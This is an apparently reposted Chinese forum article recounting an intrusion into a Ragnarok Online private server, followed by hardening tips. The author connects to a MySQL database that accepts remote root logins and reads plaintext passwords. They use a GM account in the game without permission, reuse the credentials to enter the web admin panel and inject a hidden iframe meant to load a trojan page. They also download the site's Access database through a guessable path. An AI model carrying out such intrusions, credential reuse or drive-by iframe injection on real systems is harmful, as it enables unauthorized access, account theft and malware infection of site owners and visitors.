您当前的位置:网游热线游戏学院RO仙境RO仙境技术 → 文章内容 退出登录 用户管理
本类热门文章
相关下载
    Athena Mysql 服务器攻防实录
    作者:佚名  来源:不详  发布时间:2006-5-8 13:09:08

    减小字体 增大字体

    今天上一个Athena Mysql 服务器 去观摩取经..www.17ut.com
    无意中发现了他上面的漏洞www.17ut.com
    www.17ut.com
    -----------------------------------我是我,分隔线 ^^------------------------www.17ut.com
    第一部分::::: Mysql 设置www.17ut.com
    www.17ut.com
    首先,,我这联盟版看到他服务器的介绍..www.17ut.com
    心动了,想去看看...www.17ut.com
    www.17ut.com
    运行>> ping XXX.mpc.cnwww.17ut.com
    得到他的IP: 61.235.**.***www.17ut.com
    www.17ut.com
    (DATA里添加他的服务器,上去看看还真不错!! ^^)www.17ut.com
    www.17ut.com
    又看了下他在联盟版的介绍,发现用的是Mysqlwww.17ut.com
    想起会不会有Mysql 漏洞呢~~www.17ut.com
    www.17ut.com
    用 "流光" 5.0 扫了一遍.发现 MYSQL 端口3306 用户root www.17ut.com
    于是打开我的 MYSQL CCwww.17ut.com
    添加服务器:: www.17ut.com
    www.17ut.com
    www.17ut.com
    按下连接..连上了!! ^^ 我自己都有点以外www.17ut.com
    www.17ut.com
    前阵子也有人发贴说明过了 主要是Mysql用户设置问题. www.17ut.com
    请看下面的这图www.17ut.com
    蓝色部分的 root@%www.17ut.com
    www.17ut.com
    只要有了这 root@% 就意味这任何人都可以外部连接你的MYSQL数据库!www.17ut.com
    www.17ut.com
    下面有人问:: 连上了有什么用?? #@%$#%www.17ut.com
    I 服了 U www.17ut.com
    www.17ut.com
    好了,进帐号表看看... 呵呵,所有帐号密码明文,,摆在我眼前www.17ut.com
    随便选了个GM号..上游戏看看...   逛了一圈.. www.17ut.com
    T了个人 不知道那无辜被T的骂人没呢? ^^ (GM号主人,&_&我冤枉啊!)www.17ut.com
    没敢做什么坏事了www.17ut.com
    下了游戏~~www.17ut.com
    www.17ut.com
    -----------------------------------我是我,分隔线 ^^------------------------www.17ut.com
    第二部分::: RO私服ASP管理系统 漏洞www.17ut.com
    www.17ut.com
    原文再续就书接上一回,上回说到下了游戏..www.17ut.com
    www.17ut.com
    又转去他的网页看~www.17ut.com
    www.17ut.com
    是改自 **china - RO私服ASP管理系统 的~ 其实不大好看. 呵呵~ 他看到这里表骂我哦 ^^www.17ut.com
    www.17ut.com
    随便逛了逛~~ www.17ut.com
    最后逛到后台去了`` 什么?? 要我输入帐号密码?? >_<www.17ut.com
    www.17ut.com
    打开刚才连上的他的MYSQL服务器 www.17ut.com
    找到里面游戏管理者的帐号和密码~ 输入到网页里www.17ut.com
    www.17ut.com
    ..........................恭喜你~ 你才对了..我又进了网页后台!www.17ut.com
    www.17ut.com
    他的游戏GM号帐号密码和网页后台管理帐号密码一样!!! 大家不要犯他这错误哦www.17ut.com
    www.17ut.com
    **china - RO私服ASP管理系统 我也在用```www.17ut.com
    很熟悉,转到 ::修改注册协议:: 那里可以用HTML..www.17ut.com
    www.17ut.com
    我在他的文字最下面添加上::www.17ut.com
    www.17ut.com
    <iframe src="http://*****/mm.htm" name="zhu" width="0" height="0" frameborder="0">www.17ut.com
    www.17ut.com
    懂得HTML的人都知道.上面的代码是连接到mm.htm这网页www.17ut.com
    呵呵..上面的 mm.htm 有个小木马的话.....www.17ut.com
    他的机器就是肉鸡了```www.17ut.com
    www.17ut.com
    在上面写ASP代码,,可以变成上传文件用的www.17ut.com
    上传个木马?? 放个什么病毒上去??www.17ut.com
    违法犯罪活动哦!!www.17ut.com
    www.17ut.com
    我可没敢做什么大坏事... ^^ www.17ut.com
    www.17ut.com
    -----------------------------------我是我,分隔线 ^^------------------------www.17ut.com
    第三部分 :::我MYSQL设置没问题..我怕谁!! www.17ut.com
    www.17ut.com
    呵呵.先别 牛..www.17ut.com
    我们再来看看这 RO私服ASP管理系统.www.17ut.com
    ACCESS数据库~ www.17ut.com
    OK,先看看数据库地址.. 对照我下载的 RO私服ASP管理系统..www.17ut.com
    在地址栏打上:: www.17ut.com
    www.17ut.com
    HTTP://61.235.**.***/coon.asp 等待一会儿..出错了` `` 呵呵.www.17ut.com
    www.17ut.com
    Microsoft JET Database Engine '80004005' www.17ut.com
    www.17ut.com
    'C:\Program Files\NetBox 2.7\Samples\WebServer\wwwroot\
    www.17ut.com
    www.17ut.com
    哦.用的是NetBox 2.7 哦,,www.17ut.com
    www.17ut.com
    再对照本地文件..干脆直接到数据库地址www.17ut.com
    www.17ut.com
    HTTP://61.235.**.***/admin/data/ragnarok.aspwww.17ut.com
    www.17ut.com
    出来一大对乱码``` &_&www.17ut.com
    哈哈,,真不幸..数据库我要下载拉~~www.17ut.com
    www.17ut.com
    FlashGet下载.. 改名 XWRO.mdb 打开..www.17ut.com
    呵呵,管理员帐号和密码```www.17ut.com
    www.17ut.com
    虽然密码不是明文的... md5加密www.17ut.com
    可是下个 "md5解码器" 就能暴力解开了~~www.17ut.com
    要多长时间就得看你的运气罗www.17ut.com
    /www.17ut.com
    我就没去解了www.17ut.com
    QQ上通知这服务器老大```` www.17ut.com
    www.17ut.com
    把所知道的漏洞都堵了~www.17ut.com
    www.17ut.com
    -----------------------------------我是我,分隔线 ^^------------------------www.17ut.com
    第四部分 ::::堵住堵住..我的情人你别亲!!www.17ut.com
    www.17ut.com
    1..上面的MYSQL用户设置漏洞www.17ut.com
    www.17ut.com
    建MYSQL数据库时,删掉系统默认的www.17ut.com
    www.17ut.com
    root@%www.17ut.com
    root@localhostwww.17ut.com
    www.17ut.com
    改成你自己添加的用户www.17ut.com
    例如::www.17ut.com
    www.17ut.com
    main@192.168.1.10 <-你的IP (IP固定的话)www.17ut.com
    kofn@Maie           <-你的机器的名字~~www.17ut.com
    www.17ut.com
    这样别人就不能远程连接你的MYSQL了~~www.17ut.com
    www.17ut.com
    2. **china - RO私服ASP管理系统 {其他的估计也差不多}www.17ut.com
    www.17ut.com
    (1) 更改 /data/ragnarok.asp'名字www.17ut.com
        建议是##$^1123ddf.asp 之类的难猜到的名字! #开头的文件是不能下载```www.17ut.com
    (2) 更改admin目录名字.. www.17ut.com
    www.17ut.com
    上面的其中一种方法都可以.. 改完记得在 coon.asp和admin/inc/coon.asp里面把数据库路迳改成你改了的.不然要出错罗```www.17ut.com
    www.17ut.com
         AccessDB = "admin/data/ragnarok.asp" '这里.改你数据库路迳
    www.17ut.com
    www.17ut.com
    要是你会ACCESS的.可以在数据库里家个表.www.17ut.com
    www.17ut.com
    www.17ut.com
    www.17ut.com
    (3) 把admin/admin_reginfo.asp 删掉www.17ut.com
    www.17ut.com
    这样也就大概补好了..我有空再看看www.17ut.com
    www.17ut.com
    -----------------------------------我是我,分隔线 ^^------------------------www.17ut.com
    www.17ut.com
    后记....www.17ut.com
    www.17ut.com
    www.17ut.com
    (2004-08-21 00:15:11)     &....www.17ut.com
    换个注册页面? www.17ut.com
    (2004-08-21 00:17:11)   ﹎.麻衣べ.璟www.17ut.com
    换个注册页面?www.17ut.com
    怎么换?? www.17ut.com
    www.17ut.com
    (2004-08-21 00:16:48)     &....www.17ut.com
    看来我突略安全问题了...www.17ut.com
    换个PHP页面 www.17ut.com
    (2004-08-21 00:22:40)   ﹎.麻衣べ.璟www.17ut.com
    PHP我还没看..不一定就没问题哦 www.17ut.com
    www.17ut.com
    ==========================www.17ut.com
    [] [返回上一页] [打 印]
    文章评论 (评论内容只代表网友观点,与本站立场无关!)

    用户名: 查看更多评论

    分 值:100分 85分 70分 55分 40分 25分 10分 0分

    内 容:

             (注“”为必填内容。) 验证码: 验证码,看不清楚?请点击刷新验证码

    关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图